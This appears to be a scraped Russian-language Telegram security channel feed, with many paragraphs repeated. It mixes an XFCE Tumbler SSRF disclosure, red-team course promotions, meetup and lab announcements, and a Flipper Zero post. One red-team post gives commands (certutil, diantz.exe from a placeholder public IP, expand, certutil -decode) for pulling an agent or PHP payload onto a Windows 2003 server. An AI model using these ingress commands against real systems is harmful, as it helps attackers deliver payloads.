Forwarded from One brick to the IT world
Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
👍3
Новый курс Red Team Operator II продолжение #CRTO от Zeropointsecurity предлагает окунуться с головой в продвинутые тактики OPSEC:
- C2 Infrastructure
- Windows APIs
- Proccess Injection
- Defense Evasion
- Attack Surface Reduction
- Windows Defender Application Control
- EDR Evasion
https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii
- C2 Infrastructure
- Windows APIs
- Proccess Injection
- Defense Evasion
- Attack Surface Reduction
- Windows Defender Application Control
- EDR Evasion
https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii
Zero-Point Security
Red Team Ops II
Defence Evasion Tactics.
👍2
Распродажа курсов от TheCyberMentor TCM Academy!
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Tcm-Sec
TCM Security Academy
TCM Security Academy offers practical, job-focused cybersecurity training designed by industry-leading instructors that doesn't break the bank.
👍5
Forwarded from YAH (Egor Bogomolov)
Онлайн митап!
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
YouTube
The Standoff Talks
Митап для энтузиастов и профессионалов Offensive/Defensive Security.
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
#windows2003 #redteam #transferfiles #T1105
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
Далее нам нужно распаковать полученный файл
Утилита certutil может пригодиться для encode/decode:
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
certutil -urlcache -split -f URL file- работать не будет из за версии приложения
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
diantz.exe \\YOURPUBLICIP\file.exe c:\destinationFolder\target.cab
Далее нам нужно распаковать полученный файл
expand target.cab agent.exe
Утилита certutil может пригодиться для encode/decode:
certutil -decode target.cab target.php
👍4
Forwarded from Zhovner Hub
Топовый обзор Флиппера на Итальянском. Я почти ни слова не пониманию. Чувак вскрыл сейф, сбрутил ворота CAME и вообще выжимает максимум из устройства
https://www.youtube.com/watch?v=YeGAqnU9zeE
https://www.youtube.com/watch?v=YeGAqnU9zeE
YouTube
HO COMPRATO UNA FIGATA DA DEGLI H4CKER RUSS1 🏴☠️⚠️
Acquisto: https://amzn.to/3GXgPWW
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…
Ребята из portswigger открыли новую секцию с лабами на тему JWT атак.
Если кто то хочет быстро залететь в web security рекомендую не тратить время и деньги на сторонние курсы и остановиться на их бесплатной Web Academy.
https://portswigger.net/web-security/jwt
Если кто то хочет быстро залететь в web security рекомендую не тратить время и деньги на сторонние курсы и остановиться на их бесплатной Web Academy.
https://portswigger.net/web-security/jwt
portswigger.net
JWT attacks | Web Security Academy
In this section, we'll look at how design issues and flawed handling of JSON web tokens (JWTs) can leave websites vulnerable to a variety of high-severity ...
🔥4👍2
Ресайз ваших изображений без СМС и регистрации
https://github.com/upscayl/upscayl
Результат: https://transfer.sh/P9gEID/av41os4M7c2Gneb1kkRUyTqdJJi_upscayled_4x.jpg
Размер оригинального файла: 427К
Размер полученного файла: 12М
https://github.com/upscayl/upscayl
Результат: https://transfer.sh/P9gEID/av41os4M7c2Gneb1kkRUyTqdJJi_upscayled_4x.jpg
Размер оригинального файла: 427К
Размер полученного файла: 12М
👍1
Forwarded from Positive Events
23 августа мы провели первый митап The Standoff Talks. Очень рады были всех увидеть и пообщаться!
В программе было 8 докладов. Если вы слушали хотя бы один из них и ещё не оставляли обратную связь, расскажите, как вам → ✍️ forms.gle/EWjxKUzcMXL8hgte8
В формочке можно оставить отзыв для каждого спикера, мы передадим фидбэк лично. Также есть раздел по организационным вопросам: время, локация, еда и т.д. Ну и место для пожеланий — оставляйте там любые смелые идеи, возьмём на вооружение :)
💼 Записи докладов выложили на ютуб, все презентации спикеров ↓
🔹 Виктор Зварыкин — Не делайте так, как мы
🔹 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
🔹 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
🔹 Константин Полишин — RedTeam страдания SOC'а
🔹 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
🔹 Вадим Шелест и Михаил Дрягунов — Breaking Red
🔹 Илья Шапошников — MSSQL: dump linked passwords
🔹 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
До встречи на следующем митапе!
В программе было 8 докладов. Если вы слушали хотя бы один из них и ещё не оставляли обратную связь, расскажите, как вам → ✍️ forms.gle/EWjxKUzcMXL8hgte8
В формочке можно оставить отзыв для каждого спикера, мы передадим фидбэк лично. Также есть раздел по организационным вопросам: время, локация, еда и т.д. Ну и место для пожеланий — оставляйте там любые смелые идеи, возьмём на вооружение :)
💼 Записи докладов выложили на ютуб, все презентации спикеров ↓
🔹 Виктор Зварыкин — Не делайте так, как мы
🔹 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
🔹 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
🔹 Константин Полишин — RedTeam страдания SOC'а
🔹 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
🔹 Вадим Шелест и Михаил Дрягунов — Breaking Red
🔹 Илья Шапошников — MSSQL: dump linked passwords
🔹 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
До встречи на следующем митапе!
В TryHackMe появился модуль Host Evasions!
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
TryHackMe
Host Evasions
Understand the techniques behind host-based security and bypass the most common security products in Windows operating systems.
👍2
Forwarded from Zhovner Hub
Пейпал заблокировал $1.3M наших денег
Мы подключили возможность оплаты с помощью PayPal в нашем магазине. Через месяц пейпал заблочил все деньги без возможности вывода, а это почти полтора миллиона долларов.
Нам нужно оплачивать новую партию производства Flipper Zero и эти деньги очень критичны сейчас.
Если вы можете как-то повлиять на ситуацию или у вас есть контакты в PayPal, помогите пожауйлста.
Ответы на этот твит тоже помогут (тут вся инфа подробно):
https://twitter.com/flipper_zero/status/1567194641610465281
Мы подключили возможность оплаты с помощью PayPal в нашем магазине. Через месяц пейпал заблочил все деньги без возможности вывода, а это почти полтора миллиона долларов.
Нам нужно оплачивать новую партию производства Flipper Zero и эти деньги очень критичны сейчас.
Если вы можете как-то повлиять на ситуацию или у вас есть контакты в PayPal, помогите пожауйлста.
Ответы на этот твит тоже помогут (тут вся инфа подробно):
https://twitter.com/flipper_zero/status/1567194641610465281
💩2